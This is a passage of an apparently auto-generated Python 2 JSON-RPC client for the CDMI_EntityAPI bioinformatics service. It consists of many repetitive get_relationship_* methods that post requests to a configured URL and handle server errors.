'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SamplesDefaultControl(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SamplesDefaultControl',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Describes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Describes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDescribedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDescribedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAlignmentAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAlignmentAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesMeasurement(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesMeasurement',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDefinedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDefinedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTreeAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTreeAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DescribesTreeNode(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DescribesTreeNode',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasNodeAttribute(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasNodeAttribute',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DetectedWithMethod(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DetectedWithMethod',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DetectedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DetectedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Displays(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Displays',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsDisplayedOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsDisplayedOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Encompasses(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Encompasses',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsEncompassedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsEncompassedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_EvaluatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_EvaluatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureIsTranscriptionFactorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureIsTranscriptionFactorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTranscriptionFactorFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTranscriptionFactorFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasuresFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasuresFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Formulated(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Formulated',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasFormulatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasFormulatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GeneratedLevelsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GeneratedLevelsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasGeneratedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasGeneratedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GenomeParentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GenomeParentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DerivedFromGenome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DerivedFromGenome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAliasAssertedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAliasAssertedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssertsAliasFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssertsAliasFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasCompoundAliasFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasCompoundAliasFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
